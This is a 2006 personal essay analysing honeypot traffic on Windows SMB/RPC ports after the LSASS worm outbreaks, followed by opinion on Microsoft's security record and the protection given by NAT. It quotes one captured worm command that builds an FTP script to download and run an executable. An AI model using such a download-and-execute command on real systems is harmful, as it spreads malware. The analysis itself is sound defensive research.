LSASS Vulnerability Update

by Javantea aka. Joel R. Voss
Analysis: Sept-Oct 2006
Write-up: Nov 9, 2006
LSASS Vulnerability Analysis


In my previous essay on botnets, I referenced my work in May 2004 analyzing the threat posed by the LSASS vulnerability and worm. I also wrote that LSASS continues to suffer from vulnerabilities, the latest being Aug 10, 2006. I ran a honeypot quite similar to the one ran in 2004 (updated to capture traffic) and produced the results found in the data section. As we can plainly see, worms are still exploiting these vulnerabilities.


A simple analysis of traffic captured by a honeypot on TCP ports: 135, 139, and 445. These are ports normally open on Windows computers.


Sep 28 21:23 - Oct  2 21:36: 291 connections.

Size Count
0    130
1    1
9    1
13   1
72   26
137  115
1776 3
4428 14
Sep  7 07:23 - Sep  9 15:10: 89 connections.

Size Count
0    43
72   19
88   1
137  22
141  1
1776 2

cmd /k echo open 22483 > i&echo user 1 1 >> i &echo get eraseme_11787.exe >> i &echo quit >> i &ftp -n -s:i &eraseme_11787.exe

Negotiate Protocol Request Requested Dialects
PC NETWORK PROGRAM 1.0..LANMAN1.0..Windows for Workgroups 3.1a..LM1.2X002..LANMAN2.1..NT LM 0.12.


The only requests that are obviously virus-invoked are the 4428-byte requests. Each of these contain a string of A, B, C, and D as well as a payload that downloads a virus from an FTP server.

The 1776-byte requests are DCERPC Requests. The first data packet is a Bind call. The second is an attacking Request packet. They seem to be trying to upload Word documents blindly. Only malware does this, so these count as likely malware attacks. This is likely a test for upload ability for a multi-level attack. The name of the document is: 123456111111111111111.doc. The attacking packet is an [Unreassembled Packet]. An identifying parameter is the word MEOW printed three times in the attacking packet.

The 137-byte requests can be requests by legitimate programs improperly configured to request on networks that they should not be. More likely, these are malware attacks that first check whether the target is vulnerable before exploiting the vulnerability.

Ethereal (now known as Wireshark) detects these packets as SMB protocol "Negotiate Protocol Request" packets. Most of the source ips are in the same network, but none are in the same network. 93 of these came from one ip address ( over the span of 1 hour. Since the systems are all on far different networks, so there is no legit way that they can be scanning the entire subnet for hosts. It is much more likely that they are virus-infected computers looking for hosts.

The 72-byte requests are detected by Ethereal as NetBIOS Session Service Session Requests on port 139. Many of the names used seem to be legit, so they may be improperly configured systems. However, since they are on far different networks, I can assume that they are virus-infected computers searching for hosts.

The zero-byte requests can be a variety of things: connect-style portscan, paranoid-style malware portscan, or programs scanning improper networks looking for a reply before a request. While these are not malicious, the number of them is rather interesting. It may be that these numbers are a good statistic of how many portscans a random ip address gets. A honeypot looking at a survey of non-attack ports might be able to answer this question better.


Microsoft has consistently disregarded obvious security requirements in their operating systems. LSASS is an obvious example of this. Every Windows machine distributed has ports open with software that is sufficiently complex and poorly written. It should be obvious to anyone who knows security that the fault of the vulnerabilities lies with Microsoft. Poor design and poor security systems cause Microsoft OS to be exploitable while its competitors are not.

The addition of firewalls and automated updating to the operating system does not solve this problem since both are not perfect solutions. The problem with firewalls is that the ports vulnerable to attack are often exception for the useful purpose of that firewall. Automated updating requires reboots which reduces uptime and is difficult when all users are not on the same page as a paid administrator. NAT has been very successful in protecting against exploits since the ports open usually are not needed outside the local area network (LAN). NAT ensures that ports are blocked to all computers behind the router. Since most broadband modems are a NAT router (or require an external NAT router for multiple computers), this has protected many broadband users since the devastation of 2004.

In the 2 years since 2004, these factors have reduced the vulnerability of most systems. However, the introduction of wireless networks (WiFi) and laptops has opened up new vulnerabilities to the LAN that cannot be fully protected by the router.

Open Source operating systems and closed-source competitors of Microsoft have a distinct advantage of reducing the number of open ports on desktop and server computers. When the user of the computer open ports on these machines, they have the option of using very securely written programs that are open source. Specifically the open source programs that implement SSH, FTP, HTTP, and Samba protocols have a good track record and are quite good replacements for Microsofts LSASS system. The open source Samba programs implement the same protocol as Microsoft's LSASS system with the benefit of better security and open source.


Comments: 0

Leave a reply »

  • Leave a Reply
    Your gravatar
    Your Name